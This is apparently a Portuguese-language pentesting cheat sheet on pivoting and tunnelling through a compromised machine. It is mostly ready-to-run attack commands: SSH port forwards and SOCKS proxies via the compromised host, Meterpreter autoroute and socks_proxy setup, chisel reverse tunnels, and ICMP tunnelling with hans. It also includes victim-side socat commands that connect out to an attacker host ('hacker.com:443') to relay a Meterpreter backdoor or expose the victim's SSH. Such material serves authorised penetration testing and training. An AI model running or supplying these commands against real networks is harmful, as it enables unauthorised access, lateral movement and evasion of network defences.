Abrir uma nova porta no servidor SSH -> Outra porta
ssh -R 0.0.0.0:10521:127.0.0.1:1521 user@10.0.0.1 #Porta local 1521 acessĂvel na porta 10521 de qualquer lugar
ssh -R 0.0.0.0:10521:10.0.0.1:1521 user@10.0.0.1 #Porta remota 1521 acessĂvel na porta 10521 de qualquer lugar
Port2Port
Porta Local -> Host comprometido (SSH) -> Terceira_maquina:Porta
ssh -i ssh_key <usuario>@<ip_comprometido> -L <porta_do_atacante>:<ip_da_vitima>:<porta_remota> [-p <porta_ssh>] [-N -f] #Dessa forma, o terminal ainda estĂĄ em seu host
#Exemplo
sudo ssh -L 631:<ip_da_vitima>:631 -N -f -l <usuĂĄrio> <ip_comprometido>
Port2hostnet (proxychains)
Porta Local -> Host comprometido (SSH) -> Qualquer lugar
ssh -f -N -D <porta_do_atacante> <usuario>@<ip_comprometido> #Tudo enviado para a porta local irĂĄ ser redirecionado para o servidor comprometido (uso como proxy)
TĂșnel - VPN
VocĂȘ precisa de root em ambos os dispositivos (jĂĄ que criarĂĄ novas interfaces) e a configuração do sshd deve permitir o login de root:
PermitRootLogin yesPermitTunnel yes
ssh username@server -w any:any #Isso criarĂĄ interfaces Tun em ambos os dispositivos.
ip addr add 1.1.1.2/32 peer 1.1.1.1 dev tun0 #Client side VPN IP
ip addr add 1.1.1.1/32 peer 1.1.1.2 dev tun0 #Server side VPN IP
background# meterpreter session
route add <ip_vitima> <mĂĄscara_de_rede> <sessĂŁo> # (ex: route add 10.10.10.14 255.255.255.0 8)
use auxiliary/server/socks_proxy
run #Proxy port 1080 by default
echo "socks4 127.0.0.1 1080" > /etc/proxychains.conf #Proxychains
Outra forma:
background #meterpreter session
use post/multi/manage/autoroute
set SESSION <session_n>
set SUBNET <New_net_ip> #Ex: set SUBNET 10.1.13.0
set NETMASK <Netmask>
run
use auxiliary/server/socks_proxy
set VERSION 4a
run #Proxy port 1080 by default
echo "socks4 127.0.0.1 1080" > /etc/proxychains.conf #Proxychains
VocĂȘ pode baixĂĄ-lo na pĂĄgina de releases do https://github.com/jpillora/chisel
VocĂȘ precisa usar a mesma versĂŁo para o cliente e o servidor
socks
./chisel server -p 8080 --reverse #Server
./chisel-x64.exe client 10.10.14.3:8080 R:socks #Client
#E agora vocĂȘ pode usar proxychains com a porta 1080 (padrĂŁo)
Port forwarding
./chisel_1.7.6_linux_amd64 server -p 12312 --reverse
./chisel_1.7.6_linux_amd64 client 10.10.14.20:12312 R:4505:127.0.0.1:4505
#Crie o backdoor do meterpreter na porta 3333 e inicie o listener do msfconsole nessa porta
attacker> socat OPENSSL-LISTEN:443,cert=server.pem,cafile=client.crt,reuseaddr,fork,verify=1 TCP:127.0.0.1:3333
victim> socat.exe TCP-LISTEN:2222 OPENSSL,verify=1,cert=client.pem,cafile=server.crt,connect-timeout=5|TCP:hacker.com:443,connect-timeout=5
#Execute o meterpreter
VocĂȘ pode burlar um proxy nĂŁo autenticado executando esta linha em vez da Ășltima no console da vĂtima:
Conecte a porta SSH local (22) Ă porta 443 do host nĂŁo autorizado
attacker> sudo socat TCP4-LISTEN:443,reuseaddr,fork TCP4-LISTEN:2222,reuseaddr #Redirect port 2222 to port 443 in localhost
victim> while true; do socat TCP4:<attacker>:443 TCP4:127.0.0.1:22 ; done # Conecte-se Ă porta 443 do invasor e tudo que vier daqui serĂĄ redirecionado para a porta 22
attacker> ssh localhost -p 2222 -l www-data -i vulnerable #Conecta-se ao SSH da vĂtima
Plink.exe
à como uma versão de console do PuTTY (as opçÔes são muito semelhantes a um cliente ssh).
./hans -v -f -s 1.1.1.1 -p P@ssw0rd #Start listening (1.1.1.1 is IP of the new vpn connection)
./hans -f -c <server_ip> -p P@ssw0rd -v
ping 1.1.1.100 #ApĂłs uma conexĂŁo bem sucedida, A vĂtima estara acessĂvel pelo ip 1.1.1.100